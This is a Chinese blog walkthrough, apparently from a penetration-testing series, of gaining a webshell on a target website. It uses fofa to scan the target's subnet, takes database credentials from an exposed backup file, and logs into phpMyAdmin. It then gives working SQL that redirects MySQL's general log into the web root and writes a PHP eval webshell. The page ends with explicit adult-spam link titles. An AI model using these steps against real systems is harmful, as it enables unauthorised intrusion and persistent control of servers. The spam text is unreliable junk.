1. 【滲透實戰(zhàn)系列】|17-巧用fofa對目標網站進行getshell

        共 1069字,需瀏覽 3分鐘

         ·

        2021-07-28 01:58

        涉及知識點:

        信息搜集目標網站IP利用fofa對目標ip的c段進行搜索發(fā)現數據庫備份文件和管理界面登錄數據庫頁面,進行寫馬寫馬成功,獲取webshell

        聲明:本文僅用于安全測試。


        1、目標測試網站地址aa.bb.com

        通過信息搜集獲取到,該網站地址為ipw為x.x.x.x

        2、fofa對目標地址C段進掃描

        fofa輸入關鍵字ip=“x.x.x.0/24”進行搜索,意外發(fā)現c段開著8090端口的地址



           3、打開http://x.x.x.x:8090發(fā)現遍歷文件目錄,且意外發(fā)現數據庫備份軟件和mysql管理頁面                    


        打開數據庫備份文件mysqlbackup.bat發(fā)現賬戶和密碼

        打開mysql管理頁面

        http://x.x.x.x/MySQL/ 發(fā)現為phpMyAdmin管理頁面,利用備份文件獲取的賬戶和密碼順利登錄

        4、phpMyAdmin寫馬

        phpmyadmin后臺getshell的常用手段有以下幾種方式:

        1、select into outfile直接寫入
        2、開啟全局日志getshell
        3、使用慢查詢日志getsehll
        4、使用錯誤日志getshell
        5、利用phpmyadmin4.8.x本地文件包含漏洞getshell


        執(zhí)行以下sql語句

         show variables like '%secure%';


        發(fā)現沒有寫入權限,無法用select into outfile方法寫入shell。我們再來看一下第二種方法,利用全局變量general_log去getshell

        我們將全局日志開啟并將保存日志的目錄設為web目錄

         set global general_log=on;# 開啟日志  set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# 設置日志位置為網站目錄

        設置成功

        此時執(zhí)行如下語句即可寫入webshell到hack.php中

         select '<?php eval($_POST[whoami]); ?>'

        用蟻劍連接即可


        瀏覽 17
        點贊
        評論
        收藏
        分享

        手機掃一掃分享

        分享
        舉報
        評論
        圖片
        表情
        推薦
        點贊
        評論
        收藏
        分享

        手機掃一掃分享

        分享
        舉報
          
          

            1. 久久久久久毛片精品免费不卡 | 刘玥91精品一区二区三区黑狼人 | 黄色91免费版 | 熟女人妻AⅤ一区二区三区电影 | 末成年女A片一区二区 |